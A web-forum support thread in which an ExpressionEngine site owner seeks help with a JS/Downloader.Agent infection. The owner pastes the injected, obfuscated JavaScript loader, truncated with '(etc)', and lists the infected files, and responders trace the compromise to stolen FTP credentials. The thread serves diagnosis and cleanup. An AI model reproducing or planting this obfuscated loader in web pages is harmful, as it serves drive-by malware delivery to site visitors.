Thread

Hi there,

On http://www.alchemhealthcare.com, I have a Malware issue identified by http://vscan.urlvoid.com  (AVG v.10.0.0.1190) as JS/Downloader.Agent

I’ve checked config.php, database.php and index.php “to ensure that there is no unusual code such as iFrames or Javascript includes”

I’ve updated to the latest version of EE (v2.4.0) bit still get the tell-tale:

[removed]var nf902ae4=”“;var e1060178120b5={dbf6eafb4f182:function(){var qb=String,vb=Array.prototype.slice.call(arguments).join(""),y8=vb.substr(this.t8(),3)-578,vd,ye;vb=vb.substr(this.rd());var wd=this.vf(vb);for(var xd=0;xd<wd;xd++){try{throw(u0=this.p2(vb,xd));}catch(e){u0=e;};if(u0==’•’)
etc, etc, etc

Please can you advise me how to clean the infection and avoid re-infection?

Regards,

Peter

Hi Peter,

Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

1. Where in your files the code you posted above is being found.
2. Other scripts on your account, whether in use or not (phpBB, etc…)*

* If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

While we work through this, please check through these files:

* index.php
* admin.php
* system/index.php
* system/expressionengine/config/config.php

If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

Hi Kevin,

Many thanks for your help

>> 1. Where in your files the code you posted above is being found <<

in all the files listed below

>> If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks <<

The Host can’t find anything relevant at this time

The code below is in the html files on the server not just in dynamically generated pages

Any advice on this would be very much appreciated

Regards,

Peter

images/pm_attachments/index.html
images/smileys/index.html
images/avatars/uploads/index.html
images/avatars/uploads/index.html
images/avatars/default_set/index.html
images/avatars/default_set/index.html
images/avatars/index.html
images/avatars/index.html
images/captchas/index.html
images/captchas/index.html
images/member_photos/index.html
images/member_photos/index.html                                               images/site_images/_thumbs/index.html
images/site_images/_thumbs/index.html                                                   images/uploads/index.html
images/uploads/index.html
images/uploads/_thumbs/index.html
images/index.html
images/index.html
images/signature_attachments/index.html
images/signature_attachments/index.html
online-prescriptions/index.html
online-prescriptions/index.html
system/codeigniter/system/logs/index.html
system/codeigniter/system/logs/index.html
system/codeigniter/system/cache/index.html
system/codeigniter/system/cache/index.html
system/expressionengine/javascript/compressed/cp/index.html
system/expressionengine/javascript/compressed/cp/index.html
system/expressionengine/javascript/compressed/jquery/ui/i18n/index.html
system/expressionengine/javascript/compressed/jquery/ui/i18n/index.html
system/expressionengine/javascript/compressed/jquery/plugins/index.html
system/expressionengine/javascript/compressed/jquery/plugins/index.html
system/expressionengine/javascript/compressed/jquery/themes/default/images/index.html
system/expressionengine/javascript/compressed/jquery/themes/default/images/index.html
system/expressionengine/javascript/compressed/jquery/index.html
system/expressionengine/javascript/compressed/jquery/index.html
system/expressionengine/javascript/index.html
system/expressionengine/javascript/index.html
system/expressionengine/templates/default_site/CSS.group/index.html
system/expressionengine/templates/default_site/CSS.group/index.html
system/expressionengine/templates/default_site/links.group/index.html
system/expressionengine/templates/default_site/links.group/index.html
system/expressionengine/templates/default_site/site.group/index.html
system/expressionengine/templates/default_site/site.group/index.html
system/expressionengine/templates/default_site/alchem.group/index.html
system/expressionengine/templates/default_site/alchem.group/index.html
system/expressionengine/templates/default_site/Products.group/index.html
system/expressionengine/templates/default_site/Products.group/index.html
system/expressionengine/templates/default_site/healthchecks.group/index.html
system/expressionengine/templates/default_site/healthchecks.group/index.html
system/expressionengine/templates/default_site/chemist.group/index.html
system/expressionengine/templates/default_site/chemist.group/index.html
system/expressionengine/modules/blogger_api/javascript/index.html
system/expressionengine/modules/blogger_api/javascript/index.html
system/expressionengine/modules/blogger_api/models/index.html
system/expressionengine/modules/blogger_api/models/index.html
system/expressionengine/modules/blogger_api/views/index.html
system/expressionengine/modules/blogger_api/views/index.html
system/expressionengine/modules/blogger_api/index.html
system/expressionengine/modules/blogger_api/index.html
system/expressionengine/third_party/index.html
system/expressionengine/third_party/index.html
system/expressionengine/language/index.html
system/expressionengine/language/index.html
themes/third_party/index.html
themes/third_party/index.html
_thumbs/index.html
_thumbs/index.html

[removed]var nf902ae4=”“;var e1060178120b5={dbf6eafb4f182:function(){var qb=String,vb=Array.prototype.slice.call(arguments).join(""),y8=vb.substr(this.t8(),3)-578,vd,ye;vb=vb.substr(this.rd());var wd=this.vf(vb);for(var xd=0;xd<wd;xd++){try{throw(u0=this.p2(vb,xd));}catch(e){u0=e;};if(u0==’ÔÇó’){y8="";xd=this.ta(xd);sf=this.q2(vb,xd);while(this.w6(sf)){y8+=sf;xd++;sf=this.yc(vb,xd);}y8-=435;continue;}vd=”“;if(this.q0(u0)){xd++;u0=vb.substr(xd,1);while(u0!='┬▒'){vd+=u0;xd++;u0=vb.substr(xd,1);}vd=this.rc(vd,y8,47);if(vd<0)vd+=256;vd=this.v2(vd);this.oc(vd);continue;}yd=this.v9(u0);if(yd>848)yd-=848;ye=yd-y8-47;ye=this.v7(ye);nf902ae4+=this.re(ye);}},t8:function(){return 15;},rd:function(){return 18;},vf:function(v1){return v1.length;},p2:function(x3,s6){return x3.substr(s6,1);},ta:function(o3){return ++o3;},q2:function(td,rb){return td.substr(rb,1);},yc:function(n6,sd){return n6.substr(sd,1);},v2:function(t2){if(t2==168)t2=1025;else if(t2==184)t2=1105;return (t2>=192 && t2<256) ? t2+848 : t2;},w6:function(pd){return pd!='ÔÇó';},q0:function(o1){return o1=='┬▒';},rc:function(q7,n8,we){return q7-n8-we;},oc:function(ob){var qb=String;nf902ae4+=qb["fr\x6f\x6dCharCo\x64e"](ob);},re:function(oa){var qb=String;return qb["fr\x6f\x6dCharCo\x64e"](oa);},v7:function(r5){var r7=r5;if(r7<0)r7+=256;if(r7==168)r7=1025;else if(r7==184)r7=1105;return (r7>=192 && r7<256) ? r7+848 : r7;},v9:function(w1){return (w1+'')["ch\x61\x72Co\x64eAt"](0);}};e1060178120b5.dbf6eafb4f182             (etc)(etc)(etc)

Hello pblackler,

Unfortunately, no matter how many times you install *clean* files, until the actual cause is eliminated and the exploit is patched or removed, you will never get out of the loop.

The best bet is to work with your hosting provider. Chances are you are not the only one and this is either going to be a patch that needs to be applied on the server level be it Unix, PHP, MySQl, Apache, take your pick, or another application that you are using on your account.

If you can, get rid of anything you do not need and then be sure to tell your hosting provider exactly what you have installed in your domain.

Let us know how it goes and what your provider says.

Cheers,

Hi Shane,

Thanks for the reply

One thing that is noticeable is that it is two individual EE sites that are effected and others we have on the same server are not. That does suggest to me that the infection hasn’t come from “higher-up” (as it were…) and that we need to discount infection through the website(s) themselves

What do you think?

BTW after another look the host has commented as here: “I can confirm that this is not a server level issue”

Kind regards,

Peter

There is a known computer virus/script, spread by email, that targets FTP software that hasn’t been kept up-to-date, on computers that haven’t been kept up-to-date. It’s my understanding that the script sends ftp credentials back to the criminal. The criminal then FTP’s into the site, runs a scrip in your hosting account that places a short call to another compromised account somewhere. The original script is then removed.

You should change all your FTP security settings, new passwords, new usernames, and then make sure that every computer that currently connects to this account using FTP/SFTP is running up-to-date software.

We’ve had ONE of our EE sites hit with this thing, and we know that our client’s gear is/was not kept up to date, and that they had given out FTP info to 6 or more folks, and that many of those folks have personal computers that are not kept up-to-date. We had a long talk with our client.

We have 35 other EE sites on the same server, and it appears that only one had this issue, so we’re cautiously optimistic, that it’s an issue of someone not keeping their FTP software up-to-date, or not removing it before they donate their computer to a friend/relative.

EE actually helped us catch this early, as our client was updating the site when he was suddenly not able to connect to the control panel and called us to find out why. We caught this within 2 hours of thing happening.

Peter,

Does Kurt’s message shed further light on this issue?  Are you using up to date FTP software on your work and personal computers at home? The same question for anyone else who may have ftp access to this site.

Sean

Sincere apologies to you both for a slow reply and many thanks for your help.

>> You should change all your FTP security settings, new passwords, new usernames, and then make sure that every computer that currently connects to this account using FTP/SFTP is running up-to-date software <<

Yes good point, is done but will keep a watch on it

The site has been cleaned and not _yet_ re-infected…we’ll see!

Kind Regards & thanks again,

Peter

Hi pblackler,

That is awesome! I am glad to hear it. Here is hoping it stays that way.

If you have any more concerns or questions in the future, please let us know!

Cheers,